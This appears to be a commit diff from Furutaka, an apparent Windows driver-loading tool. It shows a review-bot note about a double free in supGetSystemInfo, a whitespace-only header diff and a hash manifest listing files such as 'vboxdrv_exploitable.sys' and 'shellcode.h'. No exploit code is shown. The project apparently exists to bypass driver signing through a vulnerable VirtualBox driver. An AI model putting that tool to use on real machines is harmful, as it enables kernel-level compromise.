return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
}
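Review bot: In supGetSystemInfo the retry-limit exit frees the buffer twice. The STATUS_INFO_LENGTH_MISMATCH branch calls RtlFreeHeap on Buffer and, once `c > 100`, breaks out with Buffer still holding the freed pointer, so the trailing `if (Buffer) RtlFreeHeap(hHeap, 0, Buffer);` releases it a second time. This commit appears only to re-indent the function, so the defect carries over unchanged; adding `Buffer = NULL;` directly after the RtlFreeHeap call inside the mismatch branch would close it. Separately, `Size *= 2` on a ULONG starting at 0x1000 wraps to 0 after 20 doublings, well before the cap of 100, so a lower cap or an explicit overflow check would make that exit meaningful.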


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: SUP.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* Common header file for the program support routines.
*
@ -21,39 +21,39 @@
typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
ULONG BufferSize;
PWSTR Buffer;
ULONG BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
ULONG_PTR supGetNtOsBase(
VOID
);
VOID
);
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS InfoClass
);
_In_ SYSTEM_INFORMATION_CLASS InfoClass
);
PBYTE supQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
);
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_In_ PULONG DataSize
);
BOOL supBackupVBoxDrv(
_In_ BOOL bRestore
);
_In_ BOOL bRestore
);
SIZE_T supWriteBufferToFile(
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
);
_In_ PWSTR lpFileName,
_In_ PVOID Buffer,
_In_ SIZE_T Size,
_In_ BOOL Flush,
_In_ BOOL Append
);
BOOL supIsObjectExists(
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
);
_In_ LPWSTR RootDirectory,
_In_ LPWSTR ObjectName
);
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)


@ -1,29 +1,36 @@
c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe
9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c
3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h
cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln
c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj
e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user
1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h
c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c
964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h
8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc
f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h
fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h
cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h
@ -38,10 +45,3 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutak
27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c
60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c
87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc
a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h
2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c
d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h